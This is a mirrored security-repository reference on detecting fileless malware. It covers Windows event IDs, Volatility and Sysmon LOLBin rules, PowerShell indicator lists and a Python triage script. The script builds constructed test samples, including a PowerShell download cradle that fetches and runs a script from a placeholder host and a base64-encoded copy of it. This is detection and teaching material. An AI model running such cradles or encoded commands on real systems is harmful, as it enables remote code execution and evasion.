mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-11 21:54:56 +03:00
27c6414ca5
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket, boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
# Fileless Malware Detection API Reference
## Windows Event IDs for Fileless Detection
| Event ID | Log | Description |
|---|---|---|
| 4104 | PowerShell Operational | Script Block Logging (full script content) |
| 4103 | PowerShell Operational | Module Logging |
| 1 | Sysmon | Process Creation with command line |
| 8 | Sysmon | CreateRemoteThread (injection) |
| 10 | Sysmon | ProcessAccess (injection prep) |
| 19/20/21 | Sysmon | WMI Event Filter/Consumer/Binding |
| 7045 | System | New service installed |
## python-evtx - Parse Windows Event Logs

```python
import re
import Evtx.Evtx as evtx

# Script Block Logging (Event 4104) is written to the PowerShell Operational
# log, not to Security.evtx.
with evtx.Evtx("Microsoft-Windows-PowerShell%4Operational.evtx") as log:
    for record in log.records():
        xml = record.xml()
        # python-evtx renders the element with attributes, e.g.
        # <EventID Qualifiers="">4104</EventID>, so a bare "<EventID>4104"
        # substring test would never match; allow attributes in the tag.
        if re.search(r"<EventID[^>]*>4104</EventID>", xml):
            print(record.timestamp(), xml[:500])
```
## Volatility 3 Commands

```bash
# Detect injected code (RWX memory, PE headers in non-image VADs)
vol3 -f memory.dmp windows.malfind
# List processes
vol3 -f memory.dmp windows.pslist
# Scan for hidden processes
vol3 -f memory.dmp windows.psscan
# List loaded DLLs
vol3 -f memory.dmp windows.dlllist --pid 1234
# Extract injected code
vol3 -f memory.dmp windows.malfind --dump --pid 1234
```
## LOLBins Detection Patterns (Sysmon)

```xml
<!-- Sysmon config for LOLBin monitoring -->
<RuleGroup groupRelation="or">
  <ProcessCreate onmatch="include">
    <Image condition="end with">mshta.exe</Image>
    <Image condition="end with">regsvr32.exe</Image>
    <Image condition="end with">certutil.exe</Image>
    <Image condition="end with">wmic.exe</Image>
    <Image condition="end with">cmstp.exe</Image>
    <Image condition="end with">msbuild.exe</Image>
  </ProcessCreate>
</RuleGroup>
```
## Suspicious PowerShell Indicators

- `-enc` / `-EncodedCommand` → Base64-encoded command
- `IEX` / `Invoke-Expression` → Dynamic code execution
- `Net.WebClient` → Download cradle
- `DownloadString()` → Remote script fetch
- `Reflection.Assembly` → Reflective .NET loading
- `VirtualAlloc` → Shellcode allocation
- `FromBase64String` → Payload decoding
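The Sysmon LOLBin rule group and the PowerShell indicator list above describe detection logic but do not show it running. The following is an added example, not code from this repository: it parses EVTX-style records in the XML shape python-evtx emits, scans Event 4104 script blocks and Sysmon Event 1 command lines for the indicators listed, decodes the UTF-16LE base64 payload behind `-enc`/`-EncodedCommand` before matching, and mirrors the Sysmon `end with` Image rules. It goes one step beyond the config by also comparing Sysmon's `OriginalFileName` field, so a LOLBin copied under another file name still matches. All event records and paths below are constructed test data, not captures from a real host.

```python
"""Triage PowerShell 4104 script blocks and Sysmon Event 1 process creations
against the indicator lists above. Added example; all records are constructed."""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVTX_NS = "http://schemas.microsoft.com/win/2004/08/events/event"

# Regexes for the "Suspicious PowerShell Indicators" list. The first also
# accepts the shorter -e / -ec prefixes PowerShell resolves to -EncodedCommand
# and captures the base64 blob that follows.
INDICATORS = {
    "encoded_command": r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{16,})",
    "invoke_expression": r"\bIEX\b|Invoke-Expression",
    "webclient": r"Net\.WebClient",
    "downloadstring": r"DownloadString\(",
    "reflective_load": r"Reflection\.Assembly",
    "virtualalloc": r"VirtualAlloc",
    "frombase64": r"FromBase64String",
}

# Image names from the Sysmon LOLBin rule group ("end with" conditions).
LOLBINS = ("mshta.exe", "regsvr32.exe", "certutil.exe", "wmic.exe",
           "cmstp.exe", "msbuild.exe")


def event_fields(xml_text):
    """Return (EventID, {Data Name: value}); tags matched by local name so the
    EVTX namespace is optional."""
    event_id, data = None, {}
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]
        if tag == "EventID":
            event_id = int(el.text)
        elif tag == "Data" and el.get("Name"):
            data[el.get("Name")] = el.text or ""
    return event_id, data


def decode_encoded_command(text):
    """Return the UTF-16LE payload behind -enc/-EncodedCommand, or None."""
    m = re.search(INDICATORS["encoded_command"], text, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_powershell(text):
    """Sorted indicator names hitting the text or its decoded -enc payload."""
    decoded = decode_encoded_command(text)
    if decoded:
        text = f"{text} {decoded}"
    return sorted(n for n, p in INDICATORS.items() if re.search(p, text, re.I))


def lolbin_match(data):
    """Apply the 'end with' Image rules case-insensitively (as Sysmon does) and
    also compare OriginalFileName, the PE version-info name that survives a
    rename of the binary on disk."""
    image = data.get("Image", "").lower()
    original = data.get("OriginalFileName", "").lower()
    for name in LOLBINS:
        if image.endswith(name) or original == name:
            return name
    return None


def triage(xml_text):
    """One finding per record: {event_id, indicators, lolbin}."""
    event_id, data = event_fields(xml_text)
    finding = {"event_id": event_id, "indicators": [], "lolbin": None}
    if event_id == 4104:
        finding["indicators"] = suspicious_powershell(data.get("ScriptBlockText", ""))
    elif event_id == 1:  # Sysmon process creation
        finding["lolbin"] = lolbin_match(data)
        finding["indicators"] = suspicious_powershell(data.get("CommandLine", ""))
    return finding


def _event_xml(event_id, **data):
    """Minimal EVTX-style record in the shape python-evtx emits (constructed)."""
    fields = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{EVTX_NS}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{fields}</EventData></Event>")


# Constructed samples: a plain cradle in a 4104 script block, a renamed copy
# of mshta.exe, and the same cradle hidden behind -enc (host names are .invalid).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    _event_xml(4104, ScriptBlockText=CRADLE),
    _event_xml(1, Image=r"C:\Users\Public\svchost.exe", OriginalFileName="MSHTA.EXE",
               CommandLine=r"C:\Users\Public\svchost.exe http://example.invalid/x.hta"),
    _event_xml(1, Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               OriginalFileName="PowerShell.EXE",
               CommandLine=f"powershell.exe -nop -w hidden -enc {ENCODED}"),
]

if __name__ == "__main__":
    for xml_text in SAMPLE_EVENTS:
        print(triage(xml_text))
```

In a real pipeline `SAMPLE_EVENTS` is replaced by `record.xml()` strings from the python-evtx loop above; the `OriginalFileName` comparison is the one check here that the Sysmon config itself does not perform, and it is what catches the second sample, whose Image name alone matches none of the rules.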
## WMI Persistence Check

```powershell
# List WMI event subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
```